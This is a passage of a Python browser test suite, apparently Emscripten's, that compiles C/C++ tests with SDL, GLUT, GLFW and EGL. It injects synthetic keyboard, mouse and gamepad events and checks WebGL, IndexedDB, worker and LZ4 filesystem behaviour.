document.dispatchEvent(event);
%s
}
function keyup(c) {
%s
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
%s
}
''' % ('setTimeout(function() {' if delay else '', '}, 1);' if delay else '', 'setTimeout(function() {' if delay else '', '}, 1);' if delay else ''))
self.compile_btest([test_file('sdl_key.c'), '-o', 'page.html'] + defines + async_ + ['--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?223092870')
def test_sdl_key_proxy(self):
create_file('pre.js', '''
var Module = {};
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
''')
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
keydown(1250);keydown(38);keyup(38);keyup(1250); // alt, up
keydown(1248);keydown(1249);keydown(40);keyup(40);keyup(1249);keyup(1248); // ctrl, shift, down
keydown(37);keyup(37); // left
keydown(39);keyup(39); // right
keydown(65);keyup(65); // a
keydown(66);keyup(66); // b
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('sdl_key_proxy.c', '223092870', args=['--proxy-to-worker', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'], manual_reference=True, post_build=post)
def test_canvas_focus(self):
self.btest('canvas_focus.c', '1')
def test_keydown_preventdefault_proxy(self):
def post():
html = open('test.html').read()
html = html.replace('</body>', '''
<script>
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keypress(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function keyup(c) {
var event = new KeyboardEvent("keyup", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
return document.dispatchEvent(event);
}
function sendKey(c) {
// Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
if (keydown(c) === false) {
console.log('keydown prevent defaulted, NOT sending keypress!!!');
} else {
keypress(c);
}
keyup(c);
}
// Send 'a'. Simulate the sending of the keypress event when the
// prior keydown event is not prevent defaulted.
sendKey(65);
// Send backspace. Keypress should not be sent over as default handling of
// the Keydown event should be prevented.
sendKey(8);
keydown(100);keyup(100); // trigger the end
</script>
</body>''')
create_file('test.html', html)
self.btest('keydown_preventdefault_proxy.cpp', '300', args=['--proxy-to-worker', '-s', 'EXPORTED_FUNCTIONS=[_main]'], manual_reference=True, post_build=post)
def test_sdl_text(self):
create_file('pre.js', '''
Module.postRun = function() {
function doOne() {
Module._one();
setTimeout(doOne, 1000/60);
}
setTimeout(doOne, 1000/60);
}
function simulateKeyEvent(c) {
var event = new KeyboardEvent("keypress", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.body.dispatchEvent(event);
}
''')
self.compile_btest([test_file('sdl_text.c'), '-o', 'page.html', '--pre-js', 'pre.js', '-s', 'EXPORTED_FUNCTIONS=[_main,_one]', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y, Module['canvas'].offsetLeft + x, Module['canvas'].offsetTop + y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
self.compile_btest([test_file('sdl_mouse.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_sdl_mouse_offsets(self):
create_file('pre.js', '''
function simulateMouseEvent(x, y, button) {
var event = document.createEvent("MouseEvents");
if (button >= 0) {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousedown', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event1);
var event2 = document.createEvent("MouseEvents");
event2.initMouseEvent('mouseup', true, true, window,
1, x, y, x, y,
0, 0, 0, 0,
button, null);
Module['canvas'].dispatchEvent(event2);
} else {
var event1 = document.createEvent("MouseEvents");
event1.initMouseEvent('mousemove', true, true, window,
0, x, y, x, y,
0, 0, 0, 0,
0, null);
Module['canvas'].dispatchEvent(event1);
}
}
window['simulateMouseEvent'] = simulateMouseEvent;
''')
create_file('page.html', '''
<html>
<head>
<style type="text/css">
html, body { margin: 0; padding: 0; }
#container {
position: absolute;
left: 5px; right: 0;
top: 5px; bottom: 0;
}
#canvas {
position: absolute;
left: 0; width: 600px;
top: 0; height: 450px;
}
textarea {
margin-top: 500px;
margin-left: 5px;
width: 600px;
}
</style>
</head>
<body>
<div id="container">
<canvas id="canvas"></canvas>
</div>
<textarea id="output" rows="8"></textarea>
<script type="text/javascript">
var Module = {
canvas: document.getElementById('canvas'),
print: (function() {
var element = document.getElementById('output');
element.value = ''; // clear browser cache
return function(text) {
if (arguments.length > 1) text = Array.prototype.slice.call(arguments).join(' ');
element.value += text + "\\n";
element.scrollTop = element.scrollHeight; // focus on bottom
};
})()
};
</script>
<script type="text/javascript" src="sdl_mouse.js"></script>
</body>
</html>
''')
self.compile_btest([test_file('sdl_mouse.c'), '-DTEST_SDL_MOUSE_OFFSETS', '-O2', '--minify=0', '-o', 'sdl_mouse.js', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?1')
def test_glut_touchevents(self):
self.btest('glut_touchevents.c', '1', args=['-lglut'])
def test_glut_wheelevents(self):
self.btest('glut_wheelevents.c', '1', args=['-lglut'])
@requires_graphics_hardware
def test_glut_glutget_no_antialias(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
# This test supersedes the one above, but it's skipped in the CI because anti-aliasing is not well supported by the Mesa software renderer.
@requires_graphics_hardware
def test_glut_glutget(self):
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL'])
self.btest('glut_glutget.c', '1', args=['-lglut', '-lGL', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED'])
def test_sdl_joystick_1(self):
# Generates events corresponding to the Working Draft of the HTML5 Gamepad API.
# http://www.w3.org/TR/2012/WD-gamepad-20120529/#gamepad-interface
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = 0;
};
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button] = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button] = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
def test_sdl_joystick_2(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
gamepads.push({
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
});
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('sdl_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lSDL', '-lGL'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_glfw_joystick(self):
# Generates events corresponding to the Editor's Draft of the HTML5 Gamepad API.
# https://dvcs.w3.org/hg/gamepad/raw-file/default/gamepad.html#idl-def-Gamepad
create_file('pre.js', '''
var gamepads = [];
// Spoof this function.
navigator['getGamepads'] = function() {
return gamepads;
};
window['addNewGamepad'] = function(id, numAxes, numButtons) {
var index = gamepads.length;
var gamepad = {
axes: new Array(numAxes),
buttons: new Array(numButtons),
id: id,
index: index
};
gamepads.push(gamepad)
var i;
for (i = 0; i < numAxes; i++) gamepads[index].axes[i] = 0;
// Buttons are objects
for (i = 0; i < numButtons; i++) gamepads[index].buttons[i] = { pressed: false, value: 0 };
// Dispatch event (required for glfw joystick; note not used in SDL test)
var event = new Event('gamepadconnected');
event.gamepad = gamepad;
window.dispatchEvent(event);
};
// FF mutates the original objects.
window['simulateGamepadButtonDown'] = function (index, button) {
gamepads[index].buttons[button].pressed = true;
gamepads[index].buttons[button].value = 1;
};
window['simulateGamepadButtonUp'] = function (index, button) {
gamepads[index].buttons[button].pressed = false;
gamepads[index].buttons[button].value = 0;
};
window['simulateAxisMotion'] = function (index, axis, value) {
gamepads[index].axes[axis] = value;
};
''')
self.compile_btest([test_file('test_glfw_joystick.c'), '-O2', '--minify=0', '-o', 'page.html', '--pre-js', 'pre.js', '-lGL', '-lglfw3', '-s', 'USE_GLFW=3'])
self.run_browser('page.html', '', '/report_result?2')
@requires_graphics_hardware
def test_webgl_context_attributes(self):
# JavaScript code to check which of the attributes we want to test are supported by the WebGL implementation
# (request the attribute, create a context and check its value afterwards in the context attributes).
# Tests will succeed when an attribute is not supported.
create_file('check_webgl_attributes_support.js', '''
mergeInto(LibraryManager.library, {
webglAntialiasSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {antialias: true});
attributes = context.getContextAttributes();
return attributes.antialias;
},
webglDepthSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {depth: true});
attributes = context.getContextAttributes();
return attributes.depth;
},
webglStencilSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {stencil: true});
attributes = context.getContextAttributes();
return attributes.stencil;
},
webglAlphaSupported: function() {
canvas = document.createElement('canvas');
context = canvas.getContext('experimental-webgl', {alpha: true});
attributes = context.getContextAttributes();
return attributes.alpha;
}
});
''')
# Copy common code file to temporary directory
filepath = test_file('test_webgl_context_attributes_common.c')
temp_filepath = os.path.join(self.get_dir(), os.path.basename(filepath))
shutil.copyfile(filepath, temp_filepath)
# perform tests with attributes activated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl2.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-s', 'USE_SDL=2', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-DAA_ACTIVATED', '-DDEPTH_ACTIVATED', '-DSTENCIL_ACTIVATED', '-DALPHA_ACTIVATED', '-lGL', '-lglfw', '-lGLEW'])
# perform tests with attributes deactivated
self.btest('test_webgl_context_attributes_glut.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglut', '-lGLEW'])
self.btest('test_webgl_context_attributes_sdl.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lSDL', '-lGLEW'])
self.btest('test_webgl_context_attributes_glfw.c', '1', args=['--js-library', 'check_webgl_attributes_support.js', '-lGL', '-lglfw', '-lGLEW'])
@requires_graphics_hardware
def test_webgl_no_double_error(self):
self.btest('webgl_error.cpp', '0')
# Test that -s GL_PREINITIALIZED_CONTEXT=1 works and allows user to set Module['preinitializedWebGLContext'] to a preinitialized WebGL context.
@requires_graphics_hardware
def test_preinitialized_webgl_context(self):
self.btest('preinitialized_webgl_context.cpp', '5', args=['-s', 'GL_PREINITIALIZED_CONTEXT', '--shell-file', test_file('preinitialized_webgl_context.html')])
@requires_threads
def test_emscripten_get_now(self):
for args in [[], ['-s', 'USE_PTHREADS'], ['-s', 'ENVIRONMENT=web', '-O2', '--closure=1']]:
self.btest('emscripten_get_now.cpp', '1', args=args)
def test_write_file_in_environment_web(self):
self.btest_exit('write_file.c', args=['-s', 'ENVIRONMENT=web', '-Os', '--closure=1'])
def test_fflush(self):
self.btest('test_fflush.cpp', '0', args=['-s', 'EXIT_RUNTIME', '--shell-file', test_file('test_fflush.html')], reporting=Reporting.NONE)
def test_file_db(self):
secret = str(time.time())
create_file('moar.txt', secret)
self.btest('file_db.cpp', '1', args=['--preload-file', 'moar.txt', '-DFIRST'])
shutil.copyfile('test.html', 'first.html')
self.btest('file_db.cpp', secret, args=['-s', 'FORCE_FILESYSTEM'])
shutil.copyfile('test.html', 'second.html')
create_file('moar.txt', 'aliantha')
self.btest('file_db.cpp', secret, args=['--preload-file', 'moar.txt']) # even with a file there, we load over it
shutil.move('test.html', 'third.html')
def test_fs_idbfs_sync(self):
for extra in [[], ['-DEXTRA_WORK']]:
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-lidbfs.js'] + extra)
def test_fs_idbfs_sync_force_exit(self):
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_sync.c'), '1', args=['-lidbfs.js', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_test,_success]', '-s', 'EXIT_RUNTIME', '-DFORCE_EXIT', '-lidbfs.js'])
def test_fs_idbfs_fsync(self):
# sync from persisted state into memory before main()
create_file('pre.js', '''
Module.preRun = function() {
addRunDependency('syncfs');
FS.mkdir('/working1');
FS.mount(IDBFS, {}, '/working1');
FS.syncfs(true, function (err) {
if (err) throw err;
removeRunDependency('syncfs');
});
};
''')
args = ['--pre-js', 'pre.js', '-lidbfs.js', '-s', 'EXIT_RUNTIME', '-s', 'ASYNCIFY']
secret = str(time.time())
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DFIRST', '-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
self.btest(test_file('fs', 'test_idbfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"', '-s', 'EXPORTED_FUNCTIONS=[_main,_success]', '-lidbfs.js'])
def test_fs_memfs_fsync(self):
args = ['-s', 'ASYNCIFY', '-s', 'EXIT_RUNTIME']
secret = str(time.time())
self.btest(test_file('fs', 'test_memfs_fsync.c'), '1', args=args + ['-DSECRET=\"' + secret + '\"'])
def test_fs_workerfs_read(self):
secret = 'a' * 10
secret2 = 'b' * 10
create_file('pre.js', '''
var Module = {};
Module.preRun = function() {
var blob = new Blob(['%s']);
var file = new File(['%s'], 'file.txt');
FS.mkdir('/work');
FS.mount(WORKERFS, {
blobs: [{ name: 'blob.txt', data: blob }],
files: [file],
}, '/work');
};
''' % (secret, secret2))
self.btest(test_file('fs', 'test_workerfs_read.c'), '1', args=['-lworkerfs.js', '--pre-js', 'pre.js', '-DSECRET=\"' + secret + '\"', '-DSECRET2=\"' + secret2 + '\"', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_workerfs_package(self):
create_file('file1.txt', 'first')
ensure_dir('sub')
open(os.path.join('sub', 'file2.txt'), 'w').write('second')
self.run_process([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', os.path.join('sub', 'file2.txt'), '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_workerfs_package.cpp'), '1', args=['-lworkerfs.js', '--proxy-to-worker', '-lworkerfs.js'])
def test_fs_lz4fs_package(self):
# generate data
ensure_dir('subdir')
create_file('file1.txt', '0123456789' * (1024 * 128))
open(os.path.join('subdir', 'file2.txt'), 'w').write('1234567890' * (1024 * 128))
random_data = bytearray(random.randint(0, 255) for x in range(1024 * 128 * 10 + 1))
random_data[17] = ord('X')
open('file3.txt', 'wb').write(random_data)
# compress in emcc, -s LZ4=1 tells it to tell the file packager
print('emcc-normal')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt'])
assert os.path.getsize('file1.txt') + os.path.getsize(os.path.join('subdir', 'file2.txt')) + os.path.getsize('file3.txt') == 3 * 1024 * 128 * 10 + 1
assert os.path.getsize('test.data') < (3 * 1024 * 128 * 10) / 2 # over half is gone
print(' emcc-opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['-s', 'LZ4=1', '--preload-file', 'file1.txt', '--preload-file', 'subdir/file2.txt', '--preload-file', 'file3.txt', '-O2'])
# compress in the file packager, on the server. the client receives compressed data and can just use it. this is typical usage
print('normal')
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--lz4'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' modularize')
self.compile_btest([test_file('fs', 'test_lz4fs.cpp'), '--pre-js', 'files.js', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-s', 'MODULARIZE=1'])
create_file('a.html', '''
<script src="a.out.js"></script>
<script>
Module()
</script>
''')
self.run_browser('a.html', '.', '/report_result?2')
# load the data into LZ4FS manually at runtime. This means we compress on the client. This is generally not recommended
print('manual')
subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'file1.txt', 'subdir/file2.txt', 'file3.txt', '--separate-metadata', '--js-output=files.js'])
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM'])
print(' opts')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2'])
print(' opts+closure')
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '1', args=['-DLOAD_MANUALLY', '-s', 'LZ4=1', '-s', 'FORCE_FILESYSTEM', '-O2', '--closure=1', '-g1', '-s', 'CLOSURE_WARNINGS=quiet'])
'''# non-lz4 for comparison
try:
os.mkdir('files')
except OSError:
pass
shutil.copyfile('file1.txt', os.path.join('files', 'file1.txt'))
shutil.copyfile('file2.txt', os.path.join('files', 'file2.txt'))
shutil.copyfile('file3.txt', os.path.join('files', 'file3.txt'))
out = subprocess.check_output([FILE_PACKAGER, 'files.data', '--preload', 'files/file1.txt', 'files/file2.txt', 'files/file3.txt'])
open('files.js', 'wb').write(out)
self.btest(os.path.join('fs', 'test_lz4fs.cpp'), '2', args=['--pre-js', 'files.js'])'''
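# (sketch) The size assertions earlier in this test amount to checking a
# compression ratio; a hypothetical helper making that explicit:
#
#   def compression_ratio(packed='test.data', raw_size=3 * 1024 * 128 * 10 + 1):
#     return os.path.getsize(packed) / float(raw_size)  # expected < 0.5 above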
def test_separate_metadata_later(self):
# see issue #6654 - we need to handle separate-metadata both when we run before
# the main program, and when we are run later
create_file('data.dat', ' ')
self.run_process([FILE_PACKAGER, 'more.data', '--preload', 'data.dat', '--separate-metadata', '--js-output=more.js'])
self.btest(os.path.join('browser', 'separate_metadata_later.cpp'), '1', args=['-s', 'FORCE_FILESYSTEM'])
def test_idbstore(self):
secret = str(time.time())
for stage in [0, 1, 2, 3, 0, 1, 2, 0, 0, 1, 4, 2, 5]:
self.clear()
self.btest(test_file('idbstore.c'), str(stage), args=['-lidbstore.js', '-DSTAGE=' + str(stage), '-DSECRET=\"' + secret + '\"'])
def test_idbstore_sync(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '-s', 'ASYNCIFY'])
def test_idbstore_sync_worker(self):
secret = str(time.time())
self.clear()
self.btest(test_file('idbstore_sync_worker.c'), '6', args=['-lidbstore.js', '-DSECRET=\"' + secret + '\"', '--memory-init-file', '1', '-O3', '-g2', '--proxy-to-worker', '-s', 'INITIAL_MEMORY=80MB', '-s', 'ASYNCIFY'])
def test_force_exit(self):
self.btest('force_exit.c', expected='17', args=['-s', 'EXIT_RUNTIME'])
def test_sdl_pumpevents(self):
# key events should be detected using SDL_PumpEvents
create_file('pre.js', '''
function keydown(c) {
var event = new KeyboardEvent("keydown", { 'keyCode': c, 'charCode': c, 'view': window, 'bubbles': true, 'cancelable': true });
document.dispatchEvent(event);
}
''')
self.btest_exit('sdl_pumpevents.c', assert_returncode=7, args=['--pre-js', 'pre.js', '-lSDL', '-lGL'])
def test_sdl_canvas_size(self):
self.btest('sdl_canvas_size.c', expected='1',
args=['-O2', '--minify=0', '--shell-file',
test_file('sdl_canvas_size.html'), '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_gl_read(self):
# SDL, OpenGL, readPixels
self.compile_btest([test_file('sdl_gl_read.c'), '-o', 'something.html', '-lSDL', '-lGL'])
self.run_browser('something.html', '.', '/report_result?1')
@requires_graphics_hardware
def test_sdl_gl_mapbuffers(self):
self.btest('sdl_gl_mapbuffers.c', expected='1', args=['-s', 'FULL_ES3=1', '-lSDL', '-lGL'],
message='You should see a blue triangle.')
@requires_graphics_hardware
def test_sdl_ogl(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_regal(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'USE_REGAL', '-DUSE_REGAL', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_defaultmatrixmode(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_defaultMatrixMode.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_p(self):
# Immediate mode with pointers
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_p.c', reference='screenshot-gray.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with gray at the top.')
@requires_graphics_hardware
def test_sdl_ogl_proc_alias(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_ogl_proc_alias.c', reference='screenshot-gray-purple.png', reference_slack=1,
args=['-O2', '-g2', '-s', 'INLINING_LIMIT', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'])
@requires_graphics_hardware
def test_sdl_fog_simple(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_simple.c', reference='screenshot-fog-simple.png',
args=['-O2', '--minify=0', '--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_negative(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_negative.c', reference='screenshot-fog-negative.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_density(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_density.c', reference='screenshot-fog-density.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_exp2(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_exp2.c', reference='screenshot-fog-exp2.png',
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_sdl_fog_linear(self):
shutil.copyfile(test_file('screenshot.png'), 'screenshot.png')
self.btest('sdl_fog_linear.c', reference='screenshot-fog-linear.png', reference_slack=1,
args=['--preload-file', 'screenshot.png', '-s', 'LEGACY_GL_EMULATION', '--use-preload-plugins', '-lSDL', '-lGL'],
message='You should see an image with fog.')
@requires_graphics_hardware
def test_glfw(self):
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-lglfw', '-lGL'])
self.btest('glfw.c', '1', args=['-s', 'LEGACY_GL_EMULATION', '-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_minimal(self):
self.btest('glfw_minimal.c', '1', args=['-lglfw', '-lGL'])
self.btest('glfw_minimal.c', '1', args=['-s', 'USE_GLFW=2', '-lglfw', '-lGL'])
def test_glfw_time(self):
self.btest('test_glfw_time.c', '1', args=['-s', 'USE_GLFW=3', '-lglfw', '-lGL'])
def _test_egl_base(self, *args):
self.compile_btest([test_file('test_egl.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', '', '/report_result?1')
@requires_graphics_hardware
def test_egl(self):
self._test_egl_base()
@requires_threads
@requires_graphics_hardware
def test_egl_with_proxy_to_pthread(self):
self._test_egl_base('-s', 'USE_PTHREADS', '-s', 'PROXY_TO_PTHREAD', '-s', 'OFFSCREEN_FRAMEBUFFER')
def _test_egl_width_height_base(self, *args):
self.compile_btest([test_file('test_egl_width_height.c'), '-O2', '-o', 'page.html', '-lEGL', '-lGL'] + list(args))
self.run_browser('page.html', 'Should print "(300, 150)" -- the size of the canvas in pixels', '/report_result?1')
